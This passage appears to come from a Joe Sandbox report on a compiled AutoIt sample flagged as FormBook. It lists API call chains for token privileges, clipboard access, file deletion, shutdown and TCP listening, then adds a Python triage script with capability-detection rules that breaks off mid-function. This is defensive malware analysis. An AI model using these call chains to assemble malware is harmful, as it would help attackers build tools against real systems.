                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: 45d7dca222aa76e814c5dbab729ecc75a8b5ecdc539fc8abef026a8e50a5220b
                                                      • Instruction ID: 0eea81e461974eec740a100d6ba36ca6a7876bca8531e162b13a54ffbd0b8f52
                                                      • Opcode Fuzzy Hash: 45d7dca222aa76e814c5dbab729ecc75a8b5ecdc539fc8abef026a8e50a5220b
                                                      • Instruction Fuzzy Hash: 63314371A40218BFEB206BB65C4AFBF7E6CEB44B50F201076FA09F61D1C6B55D01AB61
                                                      APIs
                                                        • Part of subcall function 00E916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9170D
                                                        • Part of subcall function 00E916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E9173A
                                                        • Part of subcall function 00E916C3: GetLastError.KERNEL32 ref: 00E9174A
                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E91286
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E912A8
                                                      • CloseHandle.KERNEL32(?), ref: 00E912B9
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E912D1
                                                      • GetProcessWindowStation.USER32 ref: 00E912EA
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00E912F4
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E91310
                                                        • Part of subcall function 00E910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E911FC), ref: 00E910D4
                                                        • Part of subcall function 00E910BF: CloseHandle.KERNEL32(?,?,00E911FC), ref: 00E910E9
                                                      Strings
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                      • String ID: $default$winsta0$Z
                                                      • API String ID: 22674027-1808616255
                                                      • Opcode ID: 2c828d3eb2f855ff8e84f2f92ff006541572b99da6b9fe7b033c1f461616df55
                                                      • Instruction ID: 896bd15f31c4fddcc1c92283a85ecca6fc2b1f00e9e5ff851ec4e26124394f7d
                                                      • Opcode Fuzzy Hash: 2c828d3eb2f855ff8e84f2f92ff006541572b99da6b9fe7b033c1f461616df55
                                                      • Instruction Fuzzy Hash: 1F81A27190020AAFEF119FA5DC49FEE7BB9EF08708F1451A9F925F62A0D7318955CB20
                                                      APIs
                                                        • Part of subcall function 00E910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91114
                                                        • Part of subcall function 00E910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91120
                                                        • Part of subcall function 00E910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E9112F
                                                        • Part of subcall function 00E910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91136
                                                        • Part of subcall function 00E910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E9114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E90BCC
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E90C00
                                                      • GetLengthSid.ADVAPI32(?), ref: 00E90C17
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E90C51
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E90C6D
                                                      • GetLengthSid.ADVAPI32(?), ref: 00E90C84
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E90C8C
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E90C93
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E90CB4
                                                      • CopySid.ADVAPI32(00000000), ref: 00E90CBB
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E90CEA
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E90D0C
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E90D1E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90D45
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90D4C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90D55
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90D5C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90D65
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90D6C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E90D78
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90D7F
                                                        • Part of subcall function 00E91193: GetProcessHeap.KERNEL32(00000008,00E90BB1,?,00000000,?,00E90BB1,?), ref: 00E911A1
                                                        • Part of subcall function 00E91193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E90BB1,?), ref: 00E911A8
                                                        • Part of subcall function 00E91193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E90BB1,?), ref: 00E911B7
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: cc4ca4d85de614b14835851f91a0f8facbf9fe6e70f25f140ff0b96f8cd43e1e
                                                      • Instruction ID: 61f8fb7f234382c35ad11eac2e324a3bb353e9e0c11da42c22745c89a652dcef
                                                      • Opcode Fuzzy Hash: cc4ca4d85de614b14835851f91a0f8facbf9fe6e70f25f140ff0b96f8cd43e1e
                                                      • Instruction Fuzzy Hash: 75716B7290020AAFDF10DFA6DC45FEEBBBCBF04318F544525E918B6291D771AA46CB60
                                                      APIs
                                                      • OpenClipboard.USER32(00ECCC08), ref: 00EAEB29
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EAEB37
                                                      • GetClipboardData.USER32(0000000D), ref: 00EAEB43
                                                      • CloseClipboard.USER32 ref: 00EAEB4F
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EAEB87
                                                      • CloseClipboard.USER32 ref: 00EAEB91
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EAEBBC
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00EAEBC9
                                                      • GetClipboardData.USER32(00000001), ref: 00EAEBD1
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EAEBE2
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EAEC22
                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00EAEC38
                                                      • GetClipboardData.USER32(0000000F), ref: 00EAEC44
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EAEC55
                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00EAEC77
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EAEC94
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EAECD2
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EAECF3
                                                      • CountClipboardFormats.USER32 ref: 00EAED14
                                                      • CloseClipboard.USER32 ref: 00EAED59
                                                      Similarity
                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                      • String ID:
                                                      • API String ID: 420908878-0
                                                      • Opcode ID: ffbee777ffb58e36c028d40664576b99d2c0598b5a6d79852b77977ca6229a41
                                                      • Instruction ID: 304f640174e9564914b038379856ce93b45e3e82c08f3de9b2b6f212e6131401
                                                      • Opcode Fuzzy Hash: ffbee777ffb58e36c028d40664576b99d2c0598b5a6d79852b77977ca6229a41
                                                      • Instruction Fuzzy Hash: 8E61B3341042019FD310DF24D889F6ABBE4AF89718F14656DF456BB2A1CB31ED0ACB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EA69BE
                                                      • FindClose.KERNEL32(00000000), ref: 00EA6A12
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EA6A4E
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EA6A75
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA6AB2
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA6ADF
                                                      Strings
                                                      Similarity
                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                      • API String ID: 3830820486-3289030164
                                                      • Opcode ID: d75876433df4c58386d60c2378fb5e85f87006aa88a236635dbee073742eff5a
                                                      • Instruction ID: 649cb6e686de9ad661934edb40b5fcb130ae3caddc7dab74c691da020d7dbab0
                                                      • Opcode Fuzzy Hash: d75876433df4c58386d60c2378fb5e85f87006aa88a236635dbee073742eff5a
                                                      • Instruction Fuzzy Hash: ECD173B2508300AFC714EBA4C995EBBBBECAF89704F04591DF585E7191EB74DA04CB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00EA9663
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00EA96A1
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00EA96BB
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EA96D3
                                                      • FindClose.KERNEL32(00000000), ref: 00EA96DE
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EA96FA
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA974A
                                                      • SetCurrentDirectoryW.KERNEL32(00EF6B7C), ref: 00EA9768
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EA9772
                                                      • FindClose.KERNEL32(00000000), ref: 00EA977F
                                                      • FindClose.KERNEL32(00000000), ref: 00EA978F
                                                      Strings
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: 80bb72946fad32d9db166ca7920a41377ab3a8d74f3c4c28ffd9f10df0bde1ba
                                                      • Instruction ID: c5e29b6a27d5c00f95d66f557299edbb5f0504ba1ed382c8dafef19e361fc355
                                                      • Opcode Fuzzy Hash: 80bb72946fad32d9db166ca7920a41377ab3a8d74f3c4c28ffd9f10df0bde1ba
                                                      • Instruction Fuzzy Hash: E031E3325006096FDB14EFB5DC08EEE77BC9F4E324F1050A6F914F60A1DB31E9458A20
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00EA97BE
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EA9819
                                                      • FindClose.KERNEL32(00000000), ref: 00EA9824
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EA9840
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA9890
                                                      • SetCurrentDirectoryW.KERNEL32(00EF6B7C), ref: 00EA98AE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EA98B8
                                                      • FindClose.KERNEL32(00000000), ref: 00EA98C5
                                                      • FindClose.KERNEL32(00000000), ref: 00EA98D5
                                                        • Part of subcall function 00E9DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E9DB00
                                                      Strings
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: 86946056829065bc77d3f6aaf0ebb25dee96e84e3763772581abf7975d74c536
                                                      • Instruction ID: 7f7884ca8a80b3f6450a5eb1c470792bf40e3977921b5da1514d60bbe2837993
                                                      • Opcode Fuzzy Hash: 86946056829065bc77d3f6aaf0ebb25dee96e84e3763772581abf7975d74c536
                                                      • Instruction Fuzzy Hash: 0D31D4325006196EDF18EFB5EC48EEE77BC9F0B324F2051A5E914B60A1DB35E949CB20
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00EA8257
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA8267
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EA8273
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA8310
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8324
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8356
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA838C
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8395
                                                      Strings
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                      • String ID: *.*
                                                      • API String ID: 1464919966-438819550
                                                      • Opcode ID: 25e2283b6fa1029d8a36b054f3e10967c2b7e8aa45eec1cca7fe2e42fdc6d110
                                                      • Instruction ID: 437d438f9c3f5b59ac15d22964e84d56798cec212a5a493bfcf9ae37d6f88c76
                                                      • Opcode Fuzzy Hash: 25e2283b6fa1029d8a36b054f3e10967c2b7e8aa45eec1cca7fe2e42fdc6d110
                                                      • Instruction Fuzzy Hash: 25619D725043059FCB10EF60C8449AEB7E8FF89314F04582EF989A7251EB31F949CB92
                                                      APIs
                                                        • Part of subcall function 00E33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E33A97,?,?,00E32E7F,?,?,?,00000000), ref: 00E33AC2
                                                        • Part of subcall function 00E9E199: GetFileAttributesW.KERNEL32(?,00E9CF95), ref: 00E9E19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E9D122
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E9D1DD
                                                      • MoveFileW.KERNEL32(?,?), ref: 00E9D1F0
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9D20D
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9D237
                                                        • Part of subcall function 00E9D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E9D21C,?,?), ref: 00E9D2B2
                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00E9D253
                                                      • FindClose.KERNEL32(00000000), ref: 00E9D264
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 1946585618-1173974218
                                                      • Opcode ID: 21170e334804a13e0843875f8b4a1481b48c498bce403b4ebf86896ae8f8f176
                                                      • Instruction ID: d94f386219935351aebdf9b29f681cf9cc8ec70d28c4faaa5f0c287ce8384d90
                                                      • Opcode Fuzzy Hash: 21170e334804a13e0843875f8b4a1481b48c498bce403b4ebf86896ae8f8f176
                                                      • Instruction Fuzzy Hash: 96617A3180911DAECF05EBE0DE969FDBBB5AF54304F246065E442771A2EB31AF09CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: e0be149f6c4662e9ee9cd50ddbce867052a1721ba43cde29d3cb6193fb9563a2
                                                      • Instruction ID: 9aa2c1278d1f44069e28c43cd4f42a0619174085dc27632687828ae78ed57534
                                                      • Opcode Fuzzy Hash: e0be149f6c4662e9ee9cd50ddbce867052a1721ba43cde29d3cb6193fb9563a2
                                                      • Instruction Fuzzy Hash: EE418B35204611AFD720CF26D888F59BBE1AF49319F24D0A9E419AF762C736FC42CB90
                                                      APIs
                                                        • Part of subcall function 00E916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9170D
                                                        • Part of subcall function 00E916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E9173A
                                                        • Part of subcall function 00E916C3: GetLastError.KERNEL32 ref: 00E9174A
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00E9E932
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $ $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-3163812486
                                                      • Opcode ID: aca35fc8b38c2684144de454c4a8663696de6a1643423f9999dca343875c3be5
                                                      • Instruction ID: 5ca94b90195d7ae3e6f5a624a91080f4739617390760f86b6f75c64940812625
                                                      • Opcode Fuzzy Hash: aca35fc8b38c2684144de454c4a8663696de6a1643423f9999dca343875c3be5
                                                      • Instruction Fuzzy Hash: 8D014932A10311AFEF14A2B59C86FFF72ACA744754F242461FE03F22D2D9A15C448190
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EB1276
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1283
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00EB12BA
                                                      • WSAGetLastError.WSOCK32 ref: 00EB12C5
                                                      • closesocket.WSOCK32(00000000), ref: 00EB12F4
                                                      • listen.WSOCK32(00000000,00000005), ref: 00EB1303
                                                      • WSAGetLastError.WSOCK32 ref: 00EB130D
                                                      • closesocket.WSOCK32(00000000), ref: 00EB133C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                      • String ID:
                                                      • API String ID: 540024437-0
                                                      • Opcode ID: af779e249f53ad0eaf8df257916f6ad27578d9ed587a1e0531b5773904b33a2f
                                                      • Instruction ID: 4c203d65a34314422ef598bf8fbba81b29366b695cacbdfec08b103e95f38c56
                                                      • Opcode Fuzzy Hash: af779e249f53ad0eaf8df257916f6ad27578d9ed587a1e0531b5773904b33a2f
                                                      • Instruction Fuzzy Hash: 6C4196316001409FD714DF24C498B6ABBE5AF46328F6891D8D856AF2A2C771ED86CBE1
                                                      APIs
                                                      • _free.LIBCMT ref: 00E6B9D4
                                                      • _free.LIBCMT ref: 00E6B9F8
                                                      • _free.LIBCMT ref: 00E6BB7F
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00ED3700), ref: 00E6BB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00E6BC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F01270,000000FF,?,0000003F,00000000,?), ref: 00E6BC36
                                                      • _free.LIBCMT ref: 00E6BD4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: f10315632ff17765f2257c555ff9ab75712cebbeca7121ec1e739e25f8f59c01
                                                      • Instruction ID: ef272e22f5382494105387d6412b6b8f20df0c33814a95a02cc242bc4e0db3ab
                                                      • Opcode Fuzzy Hash: f10315632ff17765f2257c555ff9ab75712cebbeca7121ec1e739e25f8f59c01
                                                      • Instruction Fuzzy Hash: B7C12A71A842089FDB20DF79AC41AAABBF9EF41394F14619AE594F7252E7308E81C750
                                                      APIs
                                                        • Part of subcall function 00E33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E33A97,?,?,00E32E7F,?,?,?,00000000), ref: 00E33AC2
                                                        • Part of subcall function 00E9E199: GetFileAttributesW.KERNEL32(?,00E9CF95), ref: 00E9E19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E9D420
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9D470
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9D481
                                                      • FindClose.KERNEL32(00000000), ref: 00E9D498
                                                      • FindClose.KERNEL32(00000000), ref: 00E9D4A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: a57c2dbe410ff416c08e5259be31fedacecaebe1bd0261f6ff22815e069d76a3
                                                      • Instruction ID: bc2935559dcecd9f58315832a5eec5a38a9c1ecd1a84ac077efda5b49673bb11
                                                      • Opcode Fuzzy Hash: a57c2dbe410ff416c08e5259be31fedacecaebe1bd0261f6ff22815e069d76a3
                                                      • Instruction Fuzzy Hash: 3531707100C3559FC704EF64D8558AFBBE8AE91314F446A2DF4E5731A1EB21AA09CB63
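The entries in this part of the report are Joe Sandbox IDA-plugin summaries of functions in the main module (image base 00E30000). The report classifies the sample as a compiled AutoIt script, and the call chains listed here are consistent with what the AutoIt3 runtime's built-in functions compile to: LookupPrivilegeValueW/AdjustTokenPrivileges/ExitWindowsEx with the string SeShutdownPrivilege (Shutdown), socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)/bind/listen with a backlog of 5 (TCPListen), socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)/bind (UDPBind), FindFirstFileW/DeleteFileW/MoveFileW/CopyFileExW walking a `\*.*` pattern (FileDelete/FileMove), CoCreateInstance with `.lnk` (FileCreateShortcut) and mouse_event (MouseClick/MouseMove). That attribution is an assessment from the API patterns, not something the report states. The practical caveat is that every compiled AutoIt binary carries these routines, so they describe the interpreter's capability surface rather than what this particular script invokes; the FormBook verdict rests on the behavioural and Yara signatures in the report, not on this listing. To triage a few hundred such entries quickly, the script below (added for this page, not part of Joe Sandbox or AutoIt) parses the entry text into records keyed by the report's own "API String ID" and flags API combinations worth a closer look. The sample input is copied from three of the entries above; the rule labels, regular expression and the `FunctionEntry` record are assumptions introduced here.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: three function entries copied from the report above,
# reduced to the lines this parser reads (API call lines and the Similarity keys).
SAMPLE = r"""
APIs
  • Part of subcall function 00E916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9170D
  • Part of subcall function 00E916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E9173A
  • Part of subcall function 00E916C3: GetLastError.KERNEL32 ref: 00E9174A
• ExitWindowsEx.USER32(?,00000000), ref: 00E9E932
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EB1276
• WSAGetLastError.WSOCK32 ref: 00EB1283
• bind.WSOCK32(00000000,?,00000010), ref: 00EB12BA
• listen.WSOCK32(00000000,00000005), ref: 00EB1303
• closesocket.WSOCK32(00000000), ref: 00EB133C
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00E9D420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9D470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9D481
• FindClose.KERNEL32(00000000), ref: 00E9D498
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
"""

# One API call line: optional "Part of subcall function XXXX:" prefix, then Name.MODULE,
# then an argument list or a bare space, and finally the "ref: <addr>" marker.
# Metadata bullets ("• API ID:", "• Source File:") never match because they carry
# no "Name.MODULE" token directly after the bullet.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)(?:\(|\s).*?ref:\s*(?P<addr>[0-9A-Fa-f]+)"
)


@dataclass
class FunctionEntry:
    """One report entry; names are assumptions, not Joe Sandbox terminology."""
    apis: list = field(default_factory=list)   # (name, module, ref address), in report order
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""                    # the report's similarity key for the entry
    hits: list = field(default_factory=list)   # rule labels that matched

    def api_names(self):
        return {name for name, _, _ in self.apis}


# Capability rules: (label, required API names, substring that must appear in String ID or None).
# The required set must be a subset of the entry's calls; subcall lines count as well,
# which is what links AdjustTokenPrivileges (in the helper) to ExitWindowsEx (in the caller).
RULES = [
    ("reboot/shutdown after enabling SeShutdownPrivilege",
     {"AdjustTokenPrivileges", "ExitWindowsEx"}, "SeShutdownPrivilege"),
    ("TCP listening socket", {"socket", "bind", "listen"}, None),
    ("directory-wide file deletion", {"FindFirstFileW", "DeleteFileW"}, r"\*.*"),
    ("shortcut (.lnk) creation through COM", {"CoCreateInstance"}, ".lnk"),
    ("synthetic mouse input", {"mouse_event"}, None),
]


def parse_entries(text):
    """Split report text into FunctionEntry records; an entry closes at its 'API String ID' line."""
    entries, cur = [], FunctionEntry()
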